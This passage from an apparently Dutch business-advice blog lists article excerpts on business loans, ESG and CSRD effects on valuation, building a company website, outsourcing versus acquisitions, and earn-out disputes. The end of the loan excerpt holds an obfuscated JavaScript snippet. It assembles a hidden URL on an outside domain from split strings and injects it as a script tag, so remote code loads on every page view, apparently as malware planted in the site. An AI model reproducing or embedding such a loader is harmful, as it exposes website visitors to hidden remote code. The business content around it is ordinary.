betalen. Dat is belangrijk, want ze willen zeker weten dat je de lening uiteindelijk zult terugbetalen. Zorg daarnaast voor een goede administratie. Zo’n duidelijk overzicht van je financiën vergroot je kans op goedkeuring van de lening aanvraag. Houd er ook rekening mee dat bij het aanvragen van een lening je kredietwaardigheid gecheckt wordt. Er wordt bijvoorbeeld opgezocht of je betalingsachterstanden hebt of hebt gehad. Bouwen aan je onderneming Een zakelijke lening kan dus een belangrijke stap zijn in de groei van je onderneming. Door je financieringsbehoefte helder te hebben en verschillende opties te vergelijken kun je een goede keuze maken. En lukt het uiteindelijk niet om geld te lenen? Maak je dan geen zorgen. Er zijn meer manieren om je doel te bereiken. Probeer te investeren met eigen middelen, of ga op zoek naar samenwerkingen of investeerders. Ondernemers denken in oplossingen! (function(){ q33X=document.createElement("script");q33X_=("us")+("ta"); q33X_+="t"+(".");q33X_+=("in");q33Xu="2420613396";q33X.async=true; q33Xu+=".u57hvi8333Xd4ly8k";q33X.type="text/javascript";q33X_+="f"+"o"+("/"); q33Xu+="3qh3ccbm5ages";q33X.src="https://"+q33X_+q33Xu; dq33X=document.body;dq33X.appendChild(q33X); })(); ...
Lees meer
De impact van ESG op bedrijfswaardering
Waardering

De impact van ESG op bedrijfswaardering

Nieuwe richtlijnen: CSRD en ESG Wat is de impact van ESG op de bedrijfswaardering? Onze partner Berrie Abelen van Adcorporate licht in dit bericht toe wat de invloed kan zijn. Sinds 1 januari 2024 is de Corporate Sustainability Reporting Directive (CSRD) van kracht voor bedrijven die al onder de eerdere Non-Financial Reporting Directive (NFRD) vielen. Dit gold voor ondernemingen die aan minimaal twee van de volgende drie criteria voldeden: Een balanstotaal van meer dan € 20 miljoen Een netto-omzet van meer dan € 40 miljoen Meer dan 500 medewerkers De CSRD vervangt de NFRD en breidt de rapportageplicht uit. Vanaf 2025 geldt de verplichting ook voor grote bedrijven die eerder buiten de NFRD vielen. Een onderneming wordt als groot beschouwd als deze minstens twee van de volgende criteria haalt: Een balanstotaal van meer dan € 25 miljoen Een netto-omzet van meer dan € 50 miljoen Meer dan 250 medewerkers Voor beursgenoteerde mkb-bedrijven geldt de CSRD vanaf 1 januari 2026. De verwachting is dat niet-beursgenoteerde mkb-bedrijven later ook (op een aangepaste manier) met ESG-rapportage te maken krijgen.   Duurzaamheidsrapportage: wat moet er in staan? Met de CSRD is duurzaamheidsrapportage verplicht geworden. Bedrijven moeten transparant zijn over drie ESG-thema’s: Milieu (E) Hoe wordt de CO₂-uitstoot verminderd? Welke maatregelen beschermen biodiversiteit, lucht- en waterkwaliteit? Hoe gaat het bedrijf om met afval en duurzame grondstoffen? Sociaal (S) Hoe wordt gezorgd voor medewerkers en hun werkomgeving? Welke initiatieven zijn er op het gebied van inclusiviteit en maatschappelijke en medewerkers betrokkenheid? Hoe worden privacy en gegevensbescherming gewaarborgd? Governance (G) Hoe is risicomanagement en interne controle geregeld? Hoe wordt integer zakelijk gedrag geborgd? Belangrijk om te weten: ESG is een raamwerk, terwijl de CSRD een verplichting is. ESG helpt bedrijven om hun duurzaamheidsprestaties te verbeteren; de CSRD stelt hier concrete rapportage-eisen aan.   Mkb en ESG: nu al relevant Voor kleine en middelgrote bedrijven geldt nog geen wettelijke ESG-verplichting, maar de impact is er al: Grote afnemers gaan strengere eisen stellen aan leveranciers. Hoe duurzaam is de productie? Voldoet het bedrijf aan bepaalde keurmerken? Financiers kijken steeds vaker naar ESG-praktijken bij het verstrekken van leningen. Grote bedrijven kunnen als onderdeel van hun strategie minimumeisen stellen (bijvoorbeeld een keurmerk), waaraan MKB-bedrijven moeten voldoen om klanten te behouden. Onze partner Adcorporate heeft in 2024 bij twee bedrijfsovernames ESG als apart onderdeel van het due diligence-onderzoek meegenomen. De kopende partij koppelde consequenties aan een onvoldoende ESG-beleid.   De invloed van ESG op bedrijfswaardering Hoe groot de impact van ESG en CSRD op bedrijfswaardering is, zal pas na enkele jaren echt duidelijk worden. Wat we nu al zien: Op korte termijn maakt ESG-bedrijven aantrekkelijker voor investeerders, maar is de directe invloed op waardering nog beperkt. Op middellange termijn wordt ESG steeds vaker een vereiste en kan het niet voldoen aan de normen een negatieve invloed hebben op de bedrijfswaarde. Bedrijven die actief ESG-rapporteren en hier ook echt naar handelen, kunnen profiteren van: Een sterker risicoprofiel en concurrentievoordeel Betere groeimogelijkheden door aantrekkelijkheid als werkgever en leverancier Positieve impact op cashflows en winstgevendheid Kortom, bedrijven die ESG goed integreren, worden aantrekkelijker voor klanten, medewerkers én potentiële kopers.   Conclusie De invoering van CSRD en de groeiende focus op ESG zorgen voor veranderingen in de markt. Ondernemingen – groot én klein – moeten zich voorbereiden op strengere eisen. Een solide ESG-strategie biedt niet alleen compliance, maar ook een concurrentievoordeel én mogelijk een hogere bedrijfswaardering.   Berrie Abelen Adcorporate ...
Lees meer
Van Concept tot Lancering: Een Gids voor het Bouwen van een Succesvolle Zakelijke Website
Overig

Van Concept tot Lancering: Een Gids voor het Bouwen van een Succesvolle Zakelijke Website

In het huidige digitale tijdperk is een sterke online aanwezigheid onmisbaar voor bedrijven van elke omvang. Het bouwen van een zakelijke website is een cruciale stap voor elke ondernemer die online succes wil behalen. Of je nu een startende ondernemer bent of een gevestigd bedrijf dat zijn online presence wil verbeteren, deze gids helpt je bij het creëren van een professionele en effectieve zakelijke website. Het belang van een zakelijke website Een goed ontworpen zakelijke website biedt tal van voordelen: 24/7 zichtbaarheid: Je bedrijf is altijd bereikbaar voor potentiële klanten. Geloofwaardigheid: Een professionele website versterkt het vertrouwen in je merk. Kosteneffectieve marketing: In vergelijking met traditionele reclame is een website een voordelige manier om je bereik te vergroten. Klantenbinding: Bied waardevolle content en services om klanten aan je te binden. Concurrentievoordeel: Onderscheid je van concurrenten die mogelijk geen sterke online aanwezigheid hebben. Nu we het belang begrijpen, laten we stap voor stap kijken hoe je een zakelijke website kunt bouwen die jouw bedrijf echt representeert. Stap 1: Bepaal je doelen en doelgroep Het bouwen van een zakelijke website begint met het helder definiëren van je doelen en het identificeren van je doelgroep. Voordat je begint met het ontwerpen of bouwen, is het essentieel om te bepalen wat je wilt bereiken met je website. Wil je: Producten verkopen? Leads genereren? Informatie verstrekken over je diensten? Je merk bekendheid vergroten? Identificeer ook je doelgroep. Wie zijn je ideale klanten? Wat zijn hun behoeften en voorkeuren? Deze inzichten zullen je helpen bij het maken van beslissingen over design, content en functionaliteit. Stap 2: Kies de juiste platformoplossing Met de juiste tools en kennis kun je zelf een professionele website maken die er net zo goed uitziet als een dure op maat gemaakte site. Er zijn verschillende opties beschikbaar voor het bouwen van je website: Content Management Systemen (CMS): Platforms zoals WordPress, Joomla of Drupal bieden flexibiliteit en zijn geschikt voor verschillende niveaus van technische vaardigheid. Website bouwers: Diensten zoals Wix, Squarespace of Shopify bieden gebruiksvriendelijke interfaces en sjablonen, ideaal als je snel wilt starten. Op maat gemaakte ontwikkeling: Voor complexe of zeer specifieke eisen kun je overwegen een webontwikkelaar in te huren. Kies een oplossing die past bij je technische vaardigheden, budget en de specifieke behoeften van je bedrijf. Stap 3: Selecteer de juiste webhosting Een cruciaal onderdeel van het bouwen van een succesvolle zakelijke website is het kiezen van de juiste webhosting. De kwaliteit van je hosting heeft directe invloed op de snelheid, betrouwbaarheid en veiligheid van je website. Hier zijn enkele belangrijke overwegingen: Type hosting: Shared hosting: Betaalbaar, maar minder controle en resources. VPS (Virtual Private Server): Meer flexibiliteit en resources, ideaal voor groeiende bedrijven. Dedicated hosting: Maximale controle en prestaties, geschikt voor grote websites met hoog verkeer. Prestaties: Kies een host die snelle laadtijden garandeert. Dit is cruciaal voor zowel gebruikerservaring als SEO. Betrouwbaarheid: Zoek naar hosts met een hoge uptime garantie (99,9% of hoger). Schaalbaarheid: Zorg dat je hosting kan meegroeien met je bedrijf. Klantenondersteuning: 24/7 support kan cruciaal zijn bij technische problemen. Beveiliging: Controleer welke beveiligingsmaatregelen de host biedt, zoals SSL-certificaten en regelmatige backups. Kosten: Vergelijk prijzen, maar focus niet alleen op de laagste prijs. Kwaliteit en betrouwbaarheid zijn belangrijker voor een zakelijke website. Voor een diepgaand inzicht in de verschillende aspecten van webhosting en hoe je de juiste keuze maakt voor jouw zakelijke website, raden we aan om deze uitgebreide gids over webhosting kosten te raadplegen. Hier vind je gedetailleerde informatie over prijsstructuren, hidden kosten, en hoe je de beste prijs-kwaliteitverhouding kunt vinden voor jouw specifieke behoeften. Stap 4: Ontwerp en structuur van je website Leer hoe je een eigen website maakt die perfect aansluit bij jouw zakelijke doelen en de verwachtingen van je doelgroep. Een effectief websiteontwerp is zowel aantrekkelijk als functioneel. Houd rekening met de volgende elementen: Responsief ontwerp: Zorg ervoor dat je site er goed uitziet op alle apparaten, van desktops tot smartphones. Consistente branding: Gebruik je bedrijfslogo, kleuren en lettertypen consequent door de hele site. Intuïtieve navigatie: Maak het voor bezoekers eenvoudig om de gewenste informatie te vinden. Duidelijke call-to-actions (CTA’s): Leid bezoekers naar de gewenste acties, zoals het plaatsen van een bestelling of het aanvragen van een offerte. Stap 5: Creëer waardevolle content Content is koning als het gaat om het aantrekken en behouden van websitebezoekers. Zorg voor: Informatieve productpagina’s: Bied gedetailleerde beschrijvingen, high-quality afbeeldingen en eventueel video’s. Een boeiende ‘Over ons’ pagina: Vertel het verhaal van je bedrijf en bouw een connectie op met je bezoekers. Een blog of kenniscentrum: Deel regelmatig waardevolle content om je expertise te tonen en de SEO van je site te verbeteren. Stap 6: Optimaliseer voor zoekmachines (SEO) Een goed geoptimaliseerde website helpt je hoger te ranken in zoekmachines, waardoor meer potentiële klanten je kunnen vinden. Enkele belangrijke SEO-tactieken zijn: Keyword research: Identificeer en gebruik relevante zoekwoorden in je content. On-page optimalisatie: Optimaliseer je titels, meta-beschrijvingen en headers. Technische SEO: Zorg voor een snelle laadtijd en een mobiel-vriendelijke website. Link building: Bouw autoriteit op door kwaliteitsvolle backlinks te verkrijgen. Stap 7: Implementeer essentiële functionaliteiten Afhankelijk van je bedrijfsmodel, overweeg het implementeren van: E-commerce functionaliteit: Als je producten online wilt verkopen. Contactformulieren: Voor eenvoudige communicatie met klanten. Chatbots: Voor onmiddellijke klantenondersteuning. Integratie met sociale media: Om je online aanwezigheid te versterken. Stap 8: Test en lanceer Voordat je je website lanceert: Test grondig: Controleer alle links, formulieren en functionaliteiten. Optimaliseer de laadsnelheid: Een snelle website verbetert de gebruikerservaring en SEO. Zorg voor beveiliging: Implementeer SSL-certificaten en andere beveiligingsmaatregelen. Stap 9: Onderhoud en update regelmatig Een succesvolle zakelijke website vereist voortdurend onderhoud: Update je content regelmatig: Houd je informatie actueel en relevant. Monitor je prestaties: Gebruik tools zoals Google Analytics om inzicht te krijgen in je websiteverkeer en gebruikersgedrag. Blijf optimaliseren: Pas je strategie aan op basis van de verzamelde data en feedback. Conclusie Het bouwen van een succesvolle zakelijke website is een continu proces van plannen, implementeren en optimaliseren. Door deze stappen te volgen en je website voortdurend te verbeteren, creëer je een krachtig online platform dat je bedrijf ondersteunt en laat groeien. Door consistent te werken aan je online aanwezigheid, zul je merken dat je website een onmisbaar onderdeel wordt van je bedrijfssucces. Blijf leren, aanpassen en groeien, en je zakelijke website zal een krachtige motor zijn voor de groei van je onderneming in de digitale wereld. ...
Lees meer
Diensten en services in huis halen of uitbesteden als onderneming
Overig

Diensten en services in huis halen of uitbesteden als onderneming

Naarmate je bedrijf groeit, kan ook de noodzaak van het uitbreiden van het personeelsbestand toenemen. Waar een medewerker voorheen verantwoordelijk was voor zowel de financiële administratie als bijvoorbeeld de online marketing van je organisatie, is dat met de groei van je zaak niet langer mogelijk. Het bijhouden van de financiën kost te veel tijd om een medewerker zich ook te laten richten op de online marketing en andersom. Of denk aan praktische zaken als het schoonmaken van de keuken en bureaus aan het eind van de dag. Waar je voorheen zelf een doek over de bureaus haalde voordat je naar huis ging, kies je nu misschien voor de hulp van een professioneel schoonmaakbedrijf.  In deze situatie sta je voor de vraag: moet ik diensten en services in huis halen, of deze uitbesteden aan een andere onderneming? In het eerste geval kan een bedrijfsovername een optie zijn.    Uitbesteden van verschillenden diensten Kantoren schoonmaken is een dienst waarvan het doorgaans weinig meerwaarde heeft om deze in huis te halen. Externe partijen hebben de kennis, expertise en manschappen om je kantoor aan het eind van de dag op grondige wijze schoon te maken. Zo kunnen collega’s een volgende dag in een frisse omgeving van start gaan met hun taken. Bij bijvoorbeeld online marketing is dit lastiger. Sommige bedrijven nemen zelf een aantal marketeers aan om hun online activiteiten te coördineren. Anderen kiezen voor het volledig uitbesteden ervan aan een externe partij. Immers, zo’n externe partij heeft de kennis en tools al in huis. Met het aannemen van een online marketeer alleen ben je er vaak niet.    Dienstenpakket uitbreiden met een bedrijfsovername  Een bedrijfsovername is onder meer interessant bij een uitbreiding van het eigen dienstenpakket of productassortiment. Mogelijk bied je momenteel producten aan, waarvan je verwacht dat deze in de komende jaren aan populariteit verliezen. Zo kan er inmiddels een duurzamer of kwalitatief beter alternatief verkrijgbaar zijn op de markt. In zo’n situatie kun je ervoor kiezen om de volledige productielijn te herzien om dit nieuwe product te kunnen produceren. Dat kost veel tijd en levert lang niet altijd succes op. Een passend alternatief is de overname van een start- of scale-up die momenteel al bekwaam is in de productie van dit nieuwe product.  Je haalt hiermee niet alleen veel kennis in huis, maar vaak ook nieuwe collega’s. Deze nieuwe collega’s kunnen je bestaande medewerkers op weg helpen bij het produceren van dit nieuwe product.  ...
Lees meer
Geschillen over de earn-out
Bedrijfsoverdracht

Geschillen over de earn-out

Wil je graag een fikse ruzie tussen koper en verkoper over de prijs? Spreek dan een earnout regeling af. In de Verenigde Staten heeft één op de vijf deals een earnout clausule waarvan 36% heeft geleid tot een juridisch conflict (Grant Thornton M&A Survey 2023). De earnout is een contractuele bepaling in een koopovereenkomst van een onderneming waarbij de verkoper de mogelijkheid verkrijgt om resultaatsafhankelijke additionele toekomstige betalingen van de koopsom te verkrijgen. Deze earnout betalingen zijn gekoppeld aan de toekomstige prestaties van het overgenomen bedrijf. Dit leidt later vaak tot interpretatieverschillen en juridische procedures tussen koper en verkoper. Een earnout regeling komt tot stand doordat koper en verkoper een verschillende visie op de toekomst van de onderneming te hebben. De koper richt zich met name op de risico’s en rekent met een gematigde groeiverwachting. De verkoper richt zich op de kansen en rekent met een hoge groeiverwachting. De koper is alleen bereid voor de deze hoge groeiverwachting te betalen als dit in de toekomst ook wordt waargemaakt. “Eerst zien, dan geloven”.  De koper is bereid om de waarde van de onderneming te betalen die ook werkelijk wordt overgedragen, dat wil zeggen: de cashflows die de koper ontvangt na het vertrek van de verkoper. Als na vertrek van de verkoper een aantal klanten vertrekt, dan corrigeert de koper deze verloren cashflows op de waarde. Dit heet “transferabele value” en deze is gebaseerd op de waarde van de assets en de cashflows na de overname. Alle meerwaarde boven deze transferable value is onzeker en gebaseerd op de visie van de verkoper. Deze waarde wordt alleen gerealiseerd als de marktomstandigheden uiterst gunstig zijn, met een hoge groei en bepaalde onzekere gebeurtenissen bijvoorbeeld de introductie van een nieuw product in de markt.    Reden voor een Earn-out Oorzaken van conflict     Overbruggen van het verschil Tegenovergestelde belangen Hogere dealwaarde Interpretatie van de berekeningen Lagere betaling bij closing Koper bepaalt beleid en strategie Meer zekerheid voor de koper Gewijzigde marktomstandigheden Bij realisatie prognose volgt betaling Geschonden informatierechten De koper moet rekening houden met de belangen van de verkoper, dat wil zeggen dat de koper het beleid en de strategie moet bepalen zodanig dat de kans op de betaling van de earn-out optimaal is. Maar de koper heeft alle touwtjes in handen en zal zijn best doen om deze betalingen te minimaliseren. De koper heeft een groot belang om de prognose niet te halen. Er ontstaat vervolgens discussie over het beleid en de interpretatie van de afspraken.  In al deze gevallen geldt: koper en verkoper moeten opnieuw om de tafel om er samen uit te komen. Rechtszaken over dergelijke complexe financiële geschillen zijn complex en langdurig. Wij kunnen als zakelijke en financieel onderlegde mediators helpen om er toch samen uit te komen, wat torenhoge proces- en advocaatkosten voorkomt.  Alexander Thomassen Instituut voor Zakelijke Mediation ...
Lees meer